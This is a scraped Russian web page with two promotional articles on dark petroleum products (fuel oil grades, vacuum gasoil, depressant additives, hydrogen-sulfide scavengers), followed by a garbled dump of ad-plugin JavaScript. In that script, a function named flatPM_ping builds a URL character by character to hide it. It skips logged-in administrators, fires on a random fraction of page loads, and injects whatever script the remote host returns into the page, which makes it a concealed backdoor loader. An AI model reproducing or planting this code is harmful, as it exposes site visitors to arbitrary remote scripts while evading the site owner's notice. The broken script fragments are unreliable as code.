Глубина переработки (ГПН) является одним из основных показателей эффективности использования нефти. Это величина, которая показывает отношение объёма продуктов переработки нефти к общему объёму затраченной нефти.

Технологии переработки постоянно совершенствуются, в настоящее время существуют десятки классификаций нефтепродуктов. Однако, все существующие производные, сырьем для которых послужила нефть, возможно разделить на светлые и тёмные нефтепродукты.

Светлые нефтепродукты – это бензин, дизельное и реактивное топливо, а также продукты, которые содержат фракции только из этих топлив. Светлые нефтепродукты состоят из лёгких фракций, кипящих при относительно низких температурах, как правило, до 360°С. Такие фракции имеют окраску от бесцветной до желтой.

Тёмные нефтепродукты – продукты тёмного цвета, полученные путем нефтепереработки, имеющие в своём составе тяжёлые остатки переработки нефти и/или вакуумные дистилляты.

К тёмным нефтепродуктам относятся любые типы мазутов и дистиллятные масляные фракции. Сюда также можно включить гудроны и битумы, вакуумные газойли, газотурбинное топливо. Все эти вещества содержат тяжёлые остатки переработки и тёмные высококипящие компоненты, поэтому не являются прозрачными и обладают насыщенной окраской, вплоть до чёрной.

В среднем, по России ГПН (получение дистиллятных фракций) составляет около 70% и зависит от качества исходной нефти, от используемых технологий её переработки. Оставшиеся 30% – получаемые тёмные нефтепродукты.

  • От светлых нефтепродуктов тёмные фракции отличаются по ряду критериев:
  • — химический состав; — физические свойства;
  • — эксплуатационные свойства.

По химическому составу тёмные нефтепродукты отличаются от светлых, прежде всего, тем, что содержат более высокое количество парафинов и поликонденсированных ароматических соединений.

Как следствие, такое отличие химического состава тёмных нефтепродуктов приводит к отличию и физических свойств (тяжёлый фракционный состав, плотность, вязкость и свойства при пониженных температурах).

Что касается эксплуатационных свойств, то применение тёмных нефтепродуктов, как правило, осложняется тем, что у этих продуктов более высокая температура застывания, высокая вязкость, зачастую обводнённость, наличие сероводорода и меркаптанов. Такие продукты невозможно использовать без предварительной подготовки в полной мере для получения максимума выгоды.

  1. Основные виды тёмных нефтепродуктов:
  2. — все виды мазутов, которые представляют собой продукт тёмно-коричневого или чёрного цвета, и являются остатком нефти или её продуктов вторичной переработки после выделения из них светлых и вакуумных дистиллятов;
  3. — вакуумный газойль – представляет собой продукт переработки нефти в АВТ, это смесь жидких углеводородов и примесей, иногда является компонентом дизельного и судового маловязкого топлива; используется в качестве сырья для гидрокрекинга и каталитического крекинга;
  4. — гудрон – является остатком, который образуется при глубоком извлечении из нефти различных фракций под вакуумом;
  5. — битумы – это смолообразные или твердые продукты окисления или компаудирования гудронов.

Ряд специалистов, к тёмным нефтепродуктам относит также стабилизированный газовый конденсат тёмного цвета и нефть. Большинство тёмных нефтепродуктов используются в качестве котельных или судовых топлив.

Из-за высокого содержания парафинов, смол и асфальтенов эти продукты обладают высокой температурой застывания. Это затрудняет работу с топливом особенно при низких температурах.

Для решения данного вопроса разработаны депрессорные и депрессорно-реологические присадки, способствующие понижению температуры застывания тёмных нефтепродуктов. Кроме того, данные виды присадок справляются с ещё одной задачей, возникающей при работе с тёмными нефтепродуктами – снижение вязкости топлив.

Из-за своего химического состава и соответствующих физических свойств тёмные нефтепродукты довольно сложно перекачивать из-за высокой вязкости, особенно в зимний период.

Депрессорно-реологическая присадка для вакуумных газойлей, мазута и парафинистых нефтей Difron 4201, а также депрессорная присадка для мазута и нефти Difron 3970 уже подтвердили свою высокую промышленную эффективность в решении данного вопроса на нескольких НПЗ — «миллионниках».

На сегодняшний день существует множество способов и технологий, облегчающих работу с тёмными нефтепродуктами, решая возникающие трудности. Но максимально эффективным и экономически выгодным способом, по-прежнему, остаются промышленные присадки и реагенты.

Специалисты Топливного Региона проконсультируют по любым возникающим вопросам, а технологи проведут необходимые испытания для подбора максимально эффективных дозировок для нефтепродуктов как в лабораторных испытаниях, так и опытно-промышленный пробег на промышленном предприятии.

Источник: https://www.topreg.ru/informatsiya/stati-i-obzori/uluchshenie-svoystv-t-mnich-nefteproduktov

Темные нефтепродукты и способы улучшения их качества

Мазут представляет собой остаточный продукт первичной переработки нефти, после извлечения светлых бензиновых, керосиновых и дизельных фракций. Выход мазута составляет около половины из расчета на исходную нефть.

Зачастую мазут отправляют на дальнейшую переработку в вакуумные колонны, где при ультранизком давлении отгоняют более легкие фракции — вакуумные газойли.

Вакуумные газойли в дальнейшем используются в качестве сырья в процессах каталитического крекинга, позволяя получать высококачественные компоненты высокооктановых автомобильных бензинов и в процессах гидрокрекинга с получением низкосернистых компонентов дизельных топлив ЕВРО с отличными низкотемпературными свойствами.

Остаток вакуумной перегонки используют на установках коксования для производства кокса для электродной промышленности и в качестве сырья для производства битума, идущего на дорожное строительство.

Но и сам по себе мазут является ценным продуктом. Мазут используется как топливо при работе паровых котлов и котельных установок. Используется для производства флотского мазута.

В соответствие с ГОСТ 10585 мазут делится на три марки. Топочный мазут марок М100, М40 и флотский мазут марки Ф5. Основными отличиями между этими марками являются вязкость и температура застывания.

Флотский мазут изготавливается путем добавления в прямогонный мазут до 22% керосино-газойлевых фракций каталитического или термического крекинга, а также введением депрессорной присадки для получения требуемой температуры застывания.

Депрессорные присадки для мазута отличаются от аналогичных присадок, используемых для снижения температуры застывания и предельной температуры фильтруемости у дизельных топлив. Парафины в составе темных нефтепродуктов обладают более длинной цепочкой, поэтому для эффективной работы применяются депрессорные присадки с гораздо большей молекулярной массой.

Депрессорные присадки используются не только при производстве флотских мазутов, но и при производстве топочных марок продукции. Введение депрессорных присадок позволяет значительно снизить их температуру застывания, что помогает упростить процессы хранения, транспортировки и перекачки темных нефтепродуктов.

Мы предлагаем депрессорные присадки собственного производства CHIMTEC M370 и CHIMTEC Z591 полностью отвечающие требованиям к присадкам, применяемым в мазутах. Их применение позволяет значительно улучшить качество темных нефтепродуктов.

Также одной из проблем при производстве мазутов является повышенное содержание сероводорода. Согласно ГОСТ содержание H2S во всех марках не должно превышать 10 ppm. Для удаления нежелательных компонентов используют как технологические, так и химические методы.

Наиболее распространенным технологическим решением является отдувка инертными газами или углеводородными парами. Но более простым и экономичным методом удаления сероводорода является применение специальных химических реагентов поглотителей.

Реагент CHIMTEC 3000 является проверенным решением и позволяет получать товарные мазуты с низким содержанием сероводорода без значительных затрат на технологическое оборудование.

Источник: http://chimtec.ru/articles/darkoil

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};